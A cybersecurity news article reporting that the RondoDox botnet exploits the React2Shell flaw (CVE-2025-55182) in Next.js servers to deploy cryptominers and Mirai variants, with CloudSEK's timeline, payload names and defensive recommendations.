The RondoDox botnet is reportedly leveraging the critical React2Shell vulnerability (CVE-2025-55182) to compromise Next.js servers, deploying malware and cryptominers.
Fortinet initially documented RondoDox in July 2025 as a significant botnet known for exploiting various n-day vulnerabilities worldwide. More recently, in November, VulnCheck identified new RondoDox versions incorporating exploits for CVE-2025-24893, a critical remote code execution flaw in the XWiki Platform.
According to a recent report by cybersecurity company CloudSEK, the RondoDox botnet initiated scans for vulnerable Next.js servers on December 8, subsequently deploying botnet clients starting three days later.
React2Shell is an unauthenticated remote code execution (RCE) vulnerability. It can be exploited with a single HTTP request and impacts all frameworks utilizing the React Server Components (RSC) ‘Flight’ protocol, such as Next.js.
This vulnerability has been exploited by various threat actors to compromise numerous organizations. Notably, North Korean hackers have used React2Shell to deploy a new malware family known as EtherRAT.
As of December 30, the Shadowserver Foundation has reported identifying more than 94,000 internet-exposed assets susceptible to the React2Shell vulnerability.
CloudSEK indicates that RondoDox has undergone three distinct operational phases throughout the current year:
- Reconnaissance and vulnerability testing from March to April 2025
- Automated web app exploitation from April to June 2025
- Large-scale IoT botnet deployment from July to today
Researchers note that RondoDox has recently intensified its exploitation efforts targeting React2Shell, conducting over 40 exploit attempts within a six-day period in December.
In this operational phase, the botnet performs hourly IoT exploitation waves, specifically targeting Linksys, Wavlink, and other consumer and enterprise routers to enlist new bots.
CloudSEK states that after identifying potentially vulnerable servers, RondoDox began deploying payloads such as a coinminer (/nuts/poop), a botnet loader and health checker (/nuts/bolts), and a Mirai variant (/nuts/x86).
The ‘bolts’ component is designed to remove rival botnet malware from the compromised host, establish persistence through /etc/crontab, and terminate non-whitelisted processes every 45 seconds, according to researchers.
CloudSEK offers recommendations for organizations to defend against RondoDox activity. These include auditing and patching Next.js Server Actions, isolating IoT devices into dedicated virtual LANs, and monitoring for suspicious process executions.
